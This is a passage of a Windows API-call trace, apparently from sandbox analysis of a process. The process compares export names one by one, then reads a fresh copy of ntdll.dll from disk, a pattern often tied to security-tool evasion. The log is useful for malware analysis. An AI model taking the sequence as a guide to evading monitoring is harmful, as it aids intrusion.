[0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0169.097] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0169.098] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0169.098] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0169.098] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0169.098] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0169.098] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0169.098] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0169.098] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0169.099] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0169.099] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0169.100] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0169.100] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0169.101] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0169.126] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0169.127] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0169.127] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0169.127] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0169.127] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0169.127] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0169.127] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0169.128] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0169.129] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0169.129] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0169.129] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0169.129] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0169.129] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0169.130] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0169.130] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0169.130] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0169.130] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0169.130] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0169.130] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0169.130] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0169.130] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0169.130] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0169.131] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0169.342] GetProcessHeap () returned 0x580000 [0169.342] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x40b5040 | out: hHeap=0x580000) returned 1 [0169.348] GetProcessHeap () returned 0x580000 [0169.348] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x599260 [0169.348] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0169.348] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0169.348] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0169.349] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0169.349] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0169.349] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0169.349] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0169.349] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0169.349] GetProcessHeap () returned 0x580000 [0169.349] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1bba48) returned 0x40b6040 [0169.355] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0169.355] ReadFile (in: hFile=0x140, lpBuffer=0x40b6040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40b6040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0169.633] CloseHandle (hObject=0x140) returned 1 [0169.633] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0169.633] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0169.633] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0169.633] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0169.633] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0169.633] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0169.634] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0169.634] 